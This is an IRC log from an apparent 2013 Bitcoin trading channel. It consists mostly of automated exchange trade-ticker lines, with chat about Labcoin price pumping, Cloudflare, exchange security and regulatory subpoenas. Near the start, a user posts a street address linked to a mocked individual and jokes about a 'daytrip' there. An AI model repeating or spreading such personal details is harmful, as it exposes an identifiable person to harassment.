Director at Ekliptika Translations Aug 12 15:48:05 yup that's him Aug 12 15:48:46 http://kozlevcar.com/wp-content/uploads/2013/02/bsolar6.jpg Aug 12 15:48:58 lol selling advertising and solar power. Aug 12 15:49:05 basically two bit internet marketeer. Aug 12 15:49:51 kranjska cesta 4 4240 radovljica if you feel like taking a daytrip Aug 12 15:50:00 mp what did you do before bitcoin? Aug 12 15:50:17 manage sex slaves obv. Aug 12 15:50:29 what is up with havelock? Aug 12 15:50:33 probably Aug 12 15:51:06 Rulother-pc__ i did management consulting for large businesses. Aug 12 15:51:26 same thing basically Aug 12 15:51:26 San1ty_ people were reporting it being offline earlier. no idea. Aug 12 15:51:31 kakobrekla lol Aug 12 15:53:20 havelook has cloudflare issues for at least 2 days Aug 12 15:54:28 They need to step it up to a better cloud caching company Aug 12 15:56:04 [BTCTC] [ASICMINER-PT] 5 @ 4.15 = 20.75 BTC [-] Aug 12 15:56:56 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Aug 12 15:57:52 [BTCTC] [LABCOIN] 30 @ 0.001741 = 0.0522 BTC [-] Aug 12 15:57:54 [BTCTC] [LABCOIN] 2 @ 0.00174 = 0.0035 BTC [-] Aug 12 15:57:55 [BTCTC] [LABCOIN] 2 @ 0.001709 = 0.0034 BTC [-] Aug 12 15:57:56 [BTCTC] [LABCOIN] 20 @ 0.001708 = 0.0342 BTC [-] Aug 12 15:57:57 [BTCTC] [LABCOIN] 125 @ 0.001701 = 0.2126 BTC [-] Aug 12 15:57:58 [BTCTC] [LABCOIN] 1000 @ 0.0017 = 1.7 BTC [-] Aug 12 15:58:21 [BTCTC] [ASICMINER-PT] 4 @ 4.2 = 16.8 BTC [+] Aug 12 15:58:28 [BTCTC] [ASICMINER-PT] 8 @ 4.2 = 33.6 BTC [+] Aug 12 15:58:29 [BTCTC] [ASICMINER-PT] 13 @ 4.2 = 54.6 BTC [+] Aug 12 15:58:39 the labcoin pumping is funny lol. Aug 12 15:58:58 push it up 10%, half hour later it drops back on a tenth of the volume the push took Aug 12 16:01:24 easy to make money off of Aug 12 16:01:43 in a sense this is counter-scamming. Aug 12 16:01:54 in an ideal world the friction costs of pumping are larger than the benefits. Aug 12 16:02:09 my data shows this either marginally is the case or marginally is becoming the case Aug 12 16:02:16 if that's true then yay for open markets. Aug 12 16:03:05 of course open markets don't work unless there's open minded people, and mpoe-prs. Aug 12 16:03:56 [BTCTC] [ASICMINER-PT] 3 @ 4.19 = 12.57 BTC [-] Aug 12 16:04:30 people should not be using cloudflare at all Aug 12 16:04:56 a proxy that can capture everything and offers its services for free Aug 12 16:05:03 yeah right, nothing fishy Aug 12 16:05:33 I thought MP's previous job was "famous blogger" Aug 12 16:06:05 My point exactly pankkake Aug 12 16:06:22 My sites that used to run on it had nothing but problems Aug 12 16:07:45 [BTCTC] [TAT.ASICMINER] 25 @ 0.04174 = 1.0435 BTC [-] Aug 12 16:09:07 well there's the problems, and there's the CloudFlare: Totally not run by the NSA, we promise! Aug 12 16:09:59 [BTCTC] [LABCOIN] 20 @ 0.001674 = 0.0335 BTC [-] Aug 12 16:10:00 [BTCTC] [LABCOIN] 500 @ 0.001668 = 0.834 BTC [-] Aug 12 16:10:13 [BTCTC] [LABCOIN] 300 @ 0.001667 = 0.5001 BTC [-] Aug 12 16:10:21 [BTCTC] [LABCOIN] 30 @ 0.001667 = 0.05 BTC [-] Aug 12 16:10:39 [BTCTC] [LABCOIN] 30 @ 0.001644 = 0.0493 BTC [-] Aug 12 16:10:41 [BTCTC] [LABCOIN] 100 @ 0.001643 = 0.1643 BTC [-] Aug 12 16:10:42 [BTCTC] [LABCOIN] 300 @ 0.001621 = 0.4863 BTC [-] Aug 12 16:10:43 [BTCTC] [LABCOIN] 125 @ 0.001601 = 0.2001 BTC [-] Aug 12 16:10:45 [BTCTC] [LABCOIN] 1000 @ 0.0016 = 1.6 BTC [-] Aug 12 16:10:46 [BTCTC] [LABCOIN] 235 @ 0.001589 = 0.3734 BTC [-] Aug 12 16:10:47 [BTCTC] [LABCOIN] 1885 @ 0.001588 = 2.9934 BTC [-] Aug 12 16:11:36 [BTCTC] [LABCOIN] 50 @ 0.001584 = 0.0792 BTC [-] Aug 12 16:11:37 [BTCTC] [LABCOIN] 235 @ 0.001583 = 0.372 BTC [-] Aug 12 16:12:08 [BTCTC] [LABCOIN] 8 @ 0.001588 = 0.0127 BTC [+] Aug 12 16:12:10 [BTCTC] [LABCOIN] 30 @ 0.001584 = 0.0475 BTC [-] Aug 12 16:12:12 [BTCTC] [LABCOIN] 162 @ 0.001583 = 0.2564 BTC [-] Aug 12 16:12:37 [BTCTC] [LABCOIN] 30 @ 0.001584 = 0.0475 BTC [+] Aug 12 16:12:56 [BTCTC] [LABCOIN] 30 @ 0.001586 = 0.0476 BTC [+] Aug 12 16:12:58 [BTCTC] [LABCOIN] 4 @ 0.001585 = 0.0063 BTC [-] Aug 12 16:12:59 [BTCTC] [LABCOIN] 3 @ 0.001583 = 0.0047 BTC [-] Aug 12 16:13:00 [BTCTC] [LABCOIN] 125 @ 0.001571 = 0.1964 BTC [-] Aug 12 16:13:01 [BTCTC] [LABCOIN] 430 @ 0.00157 = 0.6751 BTC [-] Aug 12 16:13:11 [BTCTC] [LABCOIN] 1 @ 0.00157 BTC [-] Aug 12 16:13:44 [BTCTC] [LABCOIN] 30 @ 0.001571 = 0.0471 BTC [+] Aug 12 16:13:45 pankkake yeah, cloudflare is not a good model for btc exchanges. Aug 12 16:14:00 but this is a remote point. pretty much nothing the play exchanges do is actually a good model, starting with the login. Aug 12 16:14:02 [BTCTC] [TAT.VIRTUALMINE] 35 @ 0.001597 = 0.0559 BTC [-] Aug 12 16:14:15 they arguably don't have a chance, as the people they're supposedly educating don't have a clue. Aug 12 16:14:25 [BTCTC] [LABCOIN] 30 @ 0.001574 = 0.0472 BTC [+] Aug 12 16:14:27 s/chance/choice/ Aug 12 16:14:28 now btct want to force me to use 2 factor authentication, pretty much Aug 12 16:14:28 [BTCTC] [LABCOIN] 1000 @ 0.001573 = 1.573 BTC [-] Aug 12 16:14:29 [BTCTC] [LABCOIN] 569 @ 0.00157 = 0.8933 BTC [-] Aug 12 16:14:30 [BTCTC] [LABCOIN] 400 @ 0.001555 = 0.622 BTC [-] Aug 12 16:14:31 [BTCTC] [LABCOIN] 31 @ 0.001527 = 0.0473 BTC [-] Aug 12 16:14:43 if you don't do it, you have higher fees, lower widthdraw limits Aug 12 16:15:16 [BTCTC] [LABCOIN] 30 @ 0.001528 = 0.0458 BTC [+] Aug 12 16:15:23 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1994 = 0.3988 BTC [+] Aug 12 16:16:25 [BTCTC] [LABCOIN] 30 @ 0.00153 = 0.0459 BTC [+] Aug 12 16:16:25 [BTCTC] [LABCOIN] 20 @ 0.001529 = 0.0306 BTC [-] Aug 12 16:16:27 [BTCTC] [LABCOIN] 1000 @ 0.001528 = 1.528 BTC [-] Aug 12 16:16:34 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [-] Aug 12 16:17:36 [BTCTC] [LABCOIN] 30 @ 0.001541 = 0.0462 BTC [+] Aug 12 16:17:47 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [-] Aug 12 16:18:12 [BTCTC] [LABCOIN] 30 @ 0.001541 = 0.0462 BTC [+] Aug 12 16:18:13 [BTCTC] [LABCOIN] 50 @ 0.00154 = 0.077 BTC [-] Aug 12 16:18:15 [BTCTC] [LABCOIN] 500 @ 0.001526 = 0.763 BTC [-] Aug 12 16:18:16 [BTCTC] [LABCOIN] 329 @ 0.001521 = 0.5004 BTC [-] Aug 12 16:18:17 [BTCTC] [LABCOIN] 100 @ 0.001521 = 0.1521 BTC [-] Aug 12 16:18:17 [BTCTC] [LABCOIN] 1961 @ 0.001507 = 2.9552 BTC [-] Aug 12 16:18:22 when is the btcgarden ipo expected to be refunded? Aug 12 16:20:00 24-48 hours Aug 12 16:20:07 -10hours since that news was posted Aug 12 16:20:11 [BTCTC] [LABCOIN] 1 @ 0.001508 BTC [+] Aug 12 16:20:52 [BTCTC] [COGNITIVE] 2 @ 0.361 = 0.722 BTC [+] Aug 12 16:20:53 [BTCTC] [COGNITIVE] 1 @ 0.362 BTC [+] Aug 12 16:20:54 [BTCTC] [COGNITIVE] 2 @ 0.363 = 0.726 BTC [+] Aug 12 16:20:55 [BTCTC] [COGNITIVE] 1 @ 0.365 BTC [+] Aug 12 16:20:57 [BTCTC] [COGNITIVE] 3 @ 0.3699 = 1.1097 BTC [+] Aug 12 16:20:58 [BTCTC] [COGNITIVE] 3 @ 0.37 = 1.11 BTC [+] Aug 12 16:20:59 [BTCTC] [COGNITIVE] 1 @ 0.375 BTC [+] Aug 12 16:21:00 [BTCTC] [COGNITIVE] 9 @ 0.395 = 3.555 BTC [+] Aug 12 16:21:01 [BTCTC] [COGNITIVE] 4 @ 0.4 = 1.6 BTC [+] Aug 12 16:21:37 [BTCTC] [LABCOIN] 30 @ 0.001513 = 0.0454 BTC [+] Aug 12 16:21:37 [BTCTC] [LABCOIN] 20 @ 0.001512 = 0.0302 BTC [-] Aug 12 16:22:16 [BTCTC] [LABCOIN] 30 @ 0.001513 = 0.0454 BTC [+] Aug 12 16:22:17 [BTCTC] [LABCOIN] 153 @ 0.001512 = 0.2313 BTC [-] Aug 12 16:22:46 all the speculation on labcoin Aug 12 16:22:49 funny :D. Aug 12 16:23:15 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 12 16:23:16 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 12 16:23:17 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 12 16:23:18 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 12 16:23:19 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 12 16:23:21 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 12 16:23:22 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 12 16:23:24 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 12 16:23:27 http://i.imgur.com/HPRFPNj.gif Aug 12 16:23:30 what srsly Aug 12 16:23:42 [BTCTC] [LABCOIN] 30 @ 0.001559 = 0.0468 BTC [+] Aug 12 16:23:43 [BTCTC] [LABCOIN] 3 @ 0.001559 = 0.0047 BTC [+] Aug 12 16:23:44 [BTCTC] [LABCOIN] 20 @ 0.00156 = 0.0312 BTC [+] Aug 12 16:23:46 [BTCTC] [LABCOIN] 97 @ 0.001599 = 0.1551 BTC [+] Aug 12 16:24:10 [BTCTC] [LABCOIN] 30 @ 0.001526 = 0.0458 BTC [-] Aug 12 16:24:43 [BTCTC] [LABCOIN] 30 @ 0.001594 = 0.0478 BTC [+] Aug 12 16:24:44 [BTCTC] [LABCOIN] 50 @ 0.001595 = 0.0798 BTC [+] Aug 12 16:24:45 [BTCTC] [LABCOIN] 1 @ 0.001597 BTC [+] Aug 12 16:25:10 love the picture, need to get me some of those lol Aug 12 16:26:03 [BTCTC] [LABCOIN] 30 @ 0.001574 = 0.0472 BTC [-] Aug 12 16:26:03 [BTCTC] [LABCOIN] 18 @ 0.001575 = 0.0284 BTC [+] Aug 12 16:26:04 [BTCTC] [LABCOIN] 18 @ 0.001604 = 0.0289 BTC [+] Aug 12 16:26:25 [BTCTC] [LABCOIN] 30 @ 0.001528 = 0.0458 BTC [-] Aug 12 16:26:26 [BTCTC] [LABCOIN] 20 @ 0.001527 = 0.0305 BTC [-] Aug 12 16:26:28 [BTCTC] [LABCOIN] 150 @ 0.001525 = 0.2288 BTC [-] Aug 12 16:26:29 [BTCTC] [LABCOIN] 12 @ 0.001523 = 0.0183 BTC [-] Aug 12 16:26:30 [BTCTC] [LABCOIN] 100 @ 0.001522 = 0.1522 BTC [-] Aug 12 16:26:31 [BTCTC] [LABCOIN] 31 @ 0.001516 = 0.047 BTC [-] Aug 12 16:26:32 [BTCTC] [LABCOIN] 250 @ 0.001515 = 0.3788 BTC [-] Aug 12 16:26:33 [BTCTC] [LABCOIN] 90 @ 0.001513 = 0.1362 BTC [-] Aug 12 16:26:34 [BTCTC] [LABCOIN] 727 @ 0.001512 = 1.0992 BTC [-] Aug 12 16:26:35 [BTCTC] [LABCOIN] 10 @ 0.001511 = 0.0151 BTC [-] Aug 12 16:26:36 [BTCTC] [LABCOIN] 80 @ 0.00151 = 0.1208 BTC [-] Aug 12 16:26:37 [BTCTC] [LABCOIN] 87 @ 0.001508 = 0.1312 BTC [-] Aug 12 16:26:38 [BTCTC] [LABCOIN] 1 @ 0.001508 BTC [-] Aug 12 16:26:39 [BTCTC] [LABCOIN] 674 @ 0.001507 = 1.0157 BTC [-] Aug 12 16:26:40 [BTCTC] [LABCOIN] 22 @ 0.001507 = 0.0332 BTC [-] Aug 12 16:26:41 [BTCTC] [LABCOIN] 37 @ 0.001506 = 0.0557 BTC [-] Aug 12 16:26:42 [BTCTC] [LABCOIN] 300 @ 0.001505 = 0.4515 BTC [-] Aug 12 16:26:43 [BTCTC] [LABCOIN] 23 @ 0.001492 = 0.0343 BTC [-] Aug 12 16:26:44 [BTCTC] [LABCOIN] 185 @ 0.001491 = 0.2758 BTC [-] Aug 12 16:26:44 [BTCTC] [LABCOIN] 125 @ 0.00149 = 0.1863 BTC [-] Aug 12 16:26:45 [BTCTC] [LABCOIN] 1000 @ 0.001489 = 1.489 BTC [-] Aug 12 16:26:46 [BTCTC] [LABCOIN] 1257 @ 0.001488 = 1.8704 BTC [-] Aug 12 16:26:48 [BTCTC] [LABCOIN] 10000 @ 0.001487 = 14.87 BTC [-] Aug 12 16:26:49 [BTCTC] [LABCOIN] 60 @ 0.001486 = 0.0892 BTC [-] Aug 12 16:26:50 [BTCTC] [LABCOIN] 126 @ 0.001461 = 0.1841 BTC [-] Aug 12 16:26:51 [BTCTC] [LABCOIN] 10 @ 0.00146 = 0.0146 BTC [-] Aug 12 16:26:52 [BTCTC] [LABCOIN] 1000 @ 0.00146 = 1.46 BTC [-] Aug 12 16:26:53 [BTCTC] [LABCOIN] 6188 @ 0.001457 = 9.0159 BTC [-] Aug 12 16:26:53 [BTCTC] [LABCOIN] 410 @ 0.001456 = 0.597 BTC [-] Aug 12 16:26:54 [BTCTC] [LABCOIN] 15194 @ 0.001456 = 22.1225 BTC [-] Aug 12 16:26:55 ahaha kickass! Aug 12 16:27:00 [HAVELOCK] [AM1] 1 @ 3.89 BTC [+] Aug 12 16:27:19 [HAVELOCK] [AM1] 4 @ 3.9 = 15.6 BTC [+] Aug 12 16:27:21 kakobrekla imagine bubble slave hockey Aug 12 16:27:42 :) Aug 12 16:27:45 [HAVELOCK] [AM100] 4 @ 0.036 = 0.144 BTC [+] Aug 12 16:27:47 [HAVELOCK] [AM100] 29 @ 0.03600999 = 1.0443 BTC [+] Aug 12 16:27:50 [HAVELOCK] [AM100] 4 @ 0.03601 = 0.144 BTC [+] Aug 12 16:27:52 [HAVELOCK] [AM100] 1 @ 0.03602 BTC [+] Aug 12 16:27:54 [HAVELOCK] [AM100] 9 @ 0.03619 = 0.3257 BTC [+] Aug 12 16:27:56 [HAVELOCK] [AM100] 81 @ 0.0362 = 2.9322 BTC [+] Aug 12 16:27:58 [HAVELOCK] [AM100] 9 @ 0.0363888 = 0.3275 BTC [+] Aug 12 16:28:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.04 = 0.12 BTC [-] Aug 12 16:28:01 [BTCTC] [TAT.ASICMINER] 50 @ 0.04 = 2 BTC [-] Aug 12 16:28:02 [BTCTC] [TAT.ASICMINER] 14 @ 0.03972 = 0.5561 BTC [-] Aug 12 16:28:03 [BTCTC] [TAT.ASICMINER] 20 @ 0.03971 = 0.7942 BTC [-] Aug 12 16:28:05 [BTCTC] [TAT.ASICMINER] 50 @ 0.0397 = 1.985 BTC [-] Aug 12 16:28:08 [HAVELOCK] [XBOND] 8 @ 0.001047 = 0.0084 BTC [+] Aug 12 16:28:42 [BTCTC] [ASICMINER-PT] 1 @ 4.132 BTC [-] Aug 12 16:28:43 [BTCTC] [ASICMINER-PT] 1 @ 4.13 BTC [-] Aug 12 16:28:45 [BTCTC] [ASICMINER-PT] 1 @ 4.13 BTC [-] Aug 12 16:30:17 [HAVELOCK] [LABCO] 10 @ 0.00145 = 0.0145 BTC [-] Aug 12 16:30:28 [HAVELOCK] [AM100] 89 @ 0.0363888 = 3.2386 BTC [+] Aug 12 16:30:30 [HAVELOCK] [AM100] 3 @ 0.0363889 = 0.1092 BTC [+] Aug 12 16:30:32 [HAVELOCK] [AM100] 10 @ 0.0364 = 0.364 BTC [+] Aug 12 16:30:34 [HAVELOCK] [AM100] 125 @ 0.0365 = 4.5625 BTC [+] Aug 12 16:30:36 [HAVELOCK] [AM100] 10 @ 0.0367 = 0.367 BTC [+] Aug 12 16:30:39 [HAVELOCK] [AM100] 5 @ 0.0367988 = 0.184 BTC [+] Aug 12 16:30:41 [HAVELOCK] [AM100] 8 @ 0.0368 = 0.2944 BTC [+] Aug 12 16:30:43 [HAVELOCK] [LABCO] 4 @ 0.00145999 = 0.0058 BTC [+] Aug 12 16:30:48 [HAVELOCK] [LABCO] 16 @ 0.001599 = 0.0256 BTC [+] Aug 12 16:32:18 [BTCTC] [LABCOIN] 18 @ 0.001534 = 0.0276 BTC [+] Aug 12 16:32:20 [BTCTC] [LABCOIN] 59 @ 0.001533 = 0.0904 BTC [-] Aug 12 16:34:00 [HAVELOCK] [AM100] 10 @ 0.0363888 = 0.3639 BTC [-] Aug 12 16:34:09 [BTCTC] [BASIC-MINING] 3 @ 0.3199 = 0.9597 BTC [+] Aug 12 16:34:39 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 12 16:34:47 [BTCTC] [ASICMINER-PT] 1 @ 4.101 BTC [-] Aug 12 16:35:29 [BTCTC] [TAT.ASICMINER] 86 @ 0.04 = 3.44 BTC [+] Aug 12 16:35:32 [BTCTC] [TAT.ASICMINER] 14 @ 0.04049 = 0.5669 BTC [+] Aug 12 16:36:08 [BTCTC] [LABCOIN] 30 @ 0.001585 = 0.0476 BTC [+] Aug 12 16:36:09 [BTCTC] [LABCOIN] 3 @ 0.001586 = 0.0048 BTC [+] Aug 12 16:36:10 [BTCTC] [LABCOIN] 1 @ 0.001587 BTC [+] Aug 12 16:36:12 [BTCTC] [BASIC-MINING] 3 @ 0.3199 = 0.9597 BTC [+] Aug 12 16:37:20 [BTCTC] [TAT.ASICMINER] 50 @ 0.03971 = 1.9855 BTC [-] Aug 12 16:38:56 [HAVELOCK] [SMG] 80 @ 0.0001981 = 0.0158 BTC [-] Aug 12 16:39:11 [HAVELOCK] [AM1] 1 @ 3.75 BTC [-] Aug 12 16:39:58 [BTCTC] [LABCOIN] 30 @ 0.001586 = 0.0476 BTC [-] Aug 12 16:40:20 [BTCTC] [BASIC-MINING] 1 @ 0.3199 BTC [+] Aug 12 16:41:02 [BTCTC] [ASICMINER-PT] 4 @ 4.101 = 16.404 BTC [-] Aug 12 16:41:17 [BTCTC] [COGNITIVE] 3 @ 0.3401 = 1.0203 BTC [-] Aug 12 16:41:32 [BTCTC] [CRYPTO-TRADE] 5 @ 0.1995 = 0.9975 BTC [+] Aug 12 16:41:33 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1995 BTC [+] Aug 12 16:41:35 [BTCTC] [CRYPTO-TRADE] 7 @ 0.1999 = 1.3993 BTC [+] Aug 12 16:41:51 [BTCTC] [LABCOIN] 80 @ 0.001586 = 0.1269 BTC [-] Aug 12 16:42:04 [HAVELOCK] [AM100] 1 @ 0.0367 BTC [+] Aug 12 16:42:07 [HAVELOCK] [AM100] 29 @ 0.0368 = 1.0672 BTC [+] Aug 12 16:42:46 [BTCTC] [CRYPTO-TRADE] 12 @ 0.2 = 2.4 BTC [+] Aug 12 16:43:47 [BTCTC] [TAT.ASICMINER] 36 @ 0.04049 = 1.4576 BTC [+] Aug 12 16:44:14 [HAVELOCK] [AM100] 10 @ 0.0368 = 0.368 BTC [+] Aug 12 16:44:28 [BTCTC] [TAT.ASICMINER] 45 @ 0.0405 = 1.8225 BTC [+] Aug 12 16:44:46 [BTCTC] [LABCOIN] 890 @ 0.001586 = 1.4115 BTC [-] Aug 12 16:45:26 [BTCTC] [ASICMINER-PT] 6 @ 4.104 = 24.624 BTC [+] Aug 12 16:45:28 [BTCTC] [ASICMINER-PT] 2 @ 4.103 = 8.206 BTC [-] Aug 12 16:45:29 [BTCTC] [ASICMINER-PT] 20 @ 4.1 = 82 BTC [-] Aug 12 16:45:48 [BTCTC] [LABCOIN] 30 @ 0.001588 = 0.0476 BTC [+] Aug 12 16:47:27 [BTCTC] [LABCOIN] 1790 @ 0.001588 = 2.8425 BTC [+] Aug 12 16:49:55 [HAVELOCK] [LABCO] 2 @ 0.001568 = 0.0031 BTC [-] Aug 12 16:50:24 [BTCTC] [LABCOIN] 3 @ 0.001585 = 0.0048 BTC [-] Aug 12 16:51:05 [BTCTC] [LABCOIN] 27 @ 0.001586 = 0.0428 BTC [+] Aug 12 16:51:06 [BTCTC] [LABCOIN] 1300 @ 0.001545 = 2.0085 BTC [-] Aug 12 16:53:20 [BTCTC] [ASICMINER-PT] 1 @ 4.188 BTC [+] Aug 12 16:53:43 [BTCTC] [TAT.ASICMINER] 22 @ 0.0405 = 0.891 BTC [+] Aug 12 16:53:46 [BTCTC] [ASICMINER-PT] 6 @ 4.1 = 24.6 BTC [-] Aug 12 16:54:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.0405 = 0.2025 BTC [+] Aug 12 17:00:50 [BTCTC] [LABCOIN] 185 @ 0.00157 = 0.2905 BTC [+] Aug 12 17:02:37 [BTCTC] [BTC-BOND] 2 @ 0.009901 = 0.0198 BTC [-] Aug 12 17:03:02 [BTCTC] [LABCOIN] 6 @ 0.001589 = 0.0095 BTC [+] Aug 12 17:03:03 [BTCTC] [LABCOIN] 50 @ 0.00159 = 0.0795 BTC [+] Aug 12 17:03:03 [BTCTC] [LABCOIN] 492 @ 0.001594 = 0.7842 BTC [+] Aug 12 17:03:05 [BTCTC] [LABCOIN] 50 @ 0.001595 = 0.0798 BTC [+] Aug 12 17:03:06 [BTCTC] [LABCOIN] 5000 @ 0.001595 = 7.975 BTC [+] Aug 12 17:03:35 [BTCTC] [BTC-BOND] 6 @ 0.0099 = 0.0594 BTC [-] Aug 12 17:04:12 [BTCTC] [LTC-ATF.B2] 7 @ 0.01043 = 0.073 BTC [+] Aug 12 17:04:44 [BTCTC] [ACTIVEMINING] 30 @ 0.005745 = 0.1724 BTC [+] Aug 12 17:04:45 [BTCTC] [ACTIVEMINING] 6 @ 0.005746 = 0.0345 BTC [+] Aug 12 17:04:47 [BTCTC] [ACTIVEMINING] 239 @ 0.005857 = 1.3998 BTC [+] Aug 12 17:04:49 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Aug 12 17:05:00 [BTCTC] [ASICMINER-PT] 1 @ 4.186 BTC [+] Aug 12 17:07:06 obama gets clever with putin. " “I know the press likes to focus on body language, and he’s got that kind of slouch, looking like the bored kid in the back of the classroom. " Aug 12 17:07:15 http://inserbia.info/news/2013/08/putin-appears-like-the-bored-kid-in-the-back-of-the-classroom-barack-obama/ Aug 12 17:07:20 Putin appears “like the bored kid in the back of the classroom” – Barack Obama – InSerbia Ne Aug 12 17:08:25 putin does kinda seem like a stoner to me Aug 12 17:08:44 he's always pleasantly removed Aug 12 17:10:34 i'd be much surprised for an ex kgb head to be doing any sort of substance at all. Aug 12 17:10:36 [MPEX] [S.MPOE] 3654 @ 0.00084745 = 3.0966 BTC [-] Aug 12 17:10:37 [MPEX] [S.MPOE] 8304 @ 0.00084745 = 7.0372 BTC [-] Aug 12 17:11:54 http://www.theverge.com/2013/8/11/4612872/bitcoin-companies-subpoenaed-by-ny-financial-regulator-reports-wsj Aug 12 17:11:57 Bitcoin companies subpoenaed as New York financial regulators dig for answers | The Verge Aug 12 17:11:58 http://online.wsj.com/article/SB10001424127887323585604579006880143449754.html?mod=rss_Technology Aug 12 17:12:04 Regulator Examines Bitcoin Practices - WSJ.com Aug 12 17:12:25 https://bitcointalk.org/index.php?topic=272269.0 Aug 12 17:12:30 NY regulator memo: Notice of Inquiry on Virtual Currencies Aug 12 17:13:00 ThickAsThieves https://bitcointalk.org/index.php?topic=272269.msg2917382#msg2917382 Aug 12 17:16:33 [BTCTC] [LABCOIN] 20 @ 0.001574 = 0.0315 BTC [-] Aug 12 17:16:33 [BTCTC] [LABCOIN] 800 @ 0.001571 = 1.2568 BTC [-] Aug 12 17:16:35 [BTCTC] [LABCOIN] 815 @ 0.00157 = 1.2796 BTC [-] Aug 12 17:16:36 [BTCTC] [LABCOIN] 1 @ 0.001541 BTC [-] Aug 12 17:16:37 [BTCTC] [LABCOIN] 9 @ 0.00154 = 0.0139 BTC [-] Aug 12 17:16:38 [BTCTC] [LABCOIN] 1 @ 0.001533 BTC [-] Aug 12 17:16:39 [BTCTC] [LABCOIN] 1 @ 0.001531 BTC [-] Aug 12 17:16:40 [BTCTC] [LABCOIN] 10 @ 0.00153 = 0.0153 BTC [-] Aug 12 17:16:42 [BTCTC] [LABCOIN] 1 @ 0.001521 BTC [-] Aug 12 17:16:43 [BTCTC] [LABCOIN] 10 @ 0.00152 = 0.0152 BTC [-] Aug 12 17:16:44 [BTCTC] [LABCOIN] 68 @ 0.001512 = 0.1028 BTC [-] Aug 12 17:16:44 [BTCTC] [LABCOIN] 450 @ 0.001511 = 0.68 BTC [-] Aug 12 17:16:45 [BTCTC] [LABCOIN] 100 @ 0.00151 = 0.151 BTC [-] Aug 12 17:17:05 [BTCTC] [LABCOIN] 30 @ 0.001574 = 0.0472 BTC [+] Aug 12 17:18:03 [BTCTC] [LABCOIN] 2 @ 0.001591 = 0.0032 BTC [+] Aug 12 17:19:24 [HAVELOCK] [LABCO] 10 @ 0.001568 = 0.0157 BTC [-] Aug 12 17:19:32 [BTCTC] [ACTIVEMINING] 30 @ 0.005837 = 0.1751 BTC [-] Aug 12 17:19:33 [BTCTC] [ACTIVEMINING] 50 @ 0.005838 = 0.2919 BTC [+] Aug 12 17:19:35 [BTCTC] [ACTIVEMINING] 3 @ 0.005838 = 0.0175 BTC [+] Aug 12 17:19:36 [BTCTC] [ACTIVEMINING] 917 @ 0.005896 = 5.4066 BTC [+] Aug 12 17:21:28 [BTCTC] [BASIC-MINING] 6 @ 0.3195 = 1.917 BTC [-] Aug 12 17:21:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.0405 = 0.081 BTC [+] Aug 12 17:22:29 [BTCTC] [ACTIVEMINING] 92 @ 0.005895 = 0.5423 BTC [-] Aug 12 17:22:31 [BTCTC] [ACTIVEMINING] 18 @ 0.005896 = 0.1061 BTC [+] Aug 12 17:22:58 [HAVELOCK] [SMG] 10 @ 0.0002096 = 0.0021 BTC [+] Aug 12 17:23:25 [BTCTC] [DMS.SELLING] 30 @ 0.02634 = 0.7902 BTC [-] Aug 12 17:23:26 [BTCTC] [DMS.SELLING] 1 @ 0.02634 BTC [-] Aug 12 17:23:35 [BTCTC] [TAT.ASICMINER] 25 @ 0.0405 = 1.0125 BTC [+] Aug 12 17:23:52 [BTCTC] [TAT.ASICMINER] 151 @ 0.0405 = 6.1155 BTC [+] Aug 12 17:23:53 [BTCTC] [TAT.ASICMINER] 50 @ 0.0405 = 2.025 BTC [+] Aug 12 17:24:37 [BTCTC] [TAT.MINIGAME] 88 @ 0.000231 = 0.0203 BTC [+] Aug 12 17:24:53 [BTCTC] [DMS.MINING] 5 @ 0.003471 = 0.0174 BTC [-] Aug 12 17:24:53 [BTCTC] [DMS.MINING] 7 @ 0.00347 = 0.0243 BTC [-] Aug 12 17:24:55 [BTCTC] [DMS.MINING] 19 @ 0.003421 = 0.065 BTC [-] Aug 12 17:25:59 [BTCTC] [BASIC-MINING] 1 @ 0.3191 BTC [-] Aug 12 17:26:09 [BTCTC] [DMS.PURCHASE] 30 @ 0.02806 = 0.8418 BTC [-] Aug 12 17:28:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.0396 = 0.0792 BTC [-] Aug 12 17:28:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.0394 = 0.0788 BTC [-] Aug 12 17:28:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.0392 = 0.0784 BTC [-] Aug 12 17:28:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.03901 = 0.117 BTC [-] Aug 12 17:28:21 [BTCTC] [TAT.ASICMINER] 15 @ 0.039 = 0.585 BTC [-] Aug 12 17:28:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.039 = 0.078 BTC [-] Aug 12 17:28:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.039 = 0.078 BTC [-] Aug 12 17:28:25 [HAVELOCK] [AM100] 13 @ 0.0368 = 0.4784 BTC [+] Aug 12 17:28:27 [HAVELOCK] [AM100] 10 @ 0.0368 = 0.368 BTC [+] Aug 12 17:28:30 [HAVELOCK] [AM100] 5 @ 0.0368899 = 0.1844 BTC [+] Aug 12 17:28:32 [HAVELOCK] [SMG] 80 @ 0.0002096 = 0.0168 BTC [+] Aug 12 17:30:49 [BTCTC] [ACTIVEMINING] 3 @ 0.00589 = 0.0177 BTC [-] Aug 12 17:39:04 [HAVELOCK] [AM100] 50 @ 0.0368 = 1.84 BTC [-] Aug 12 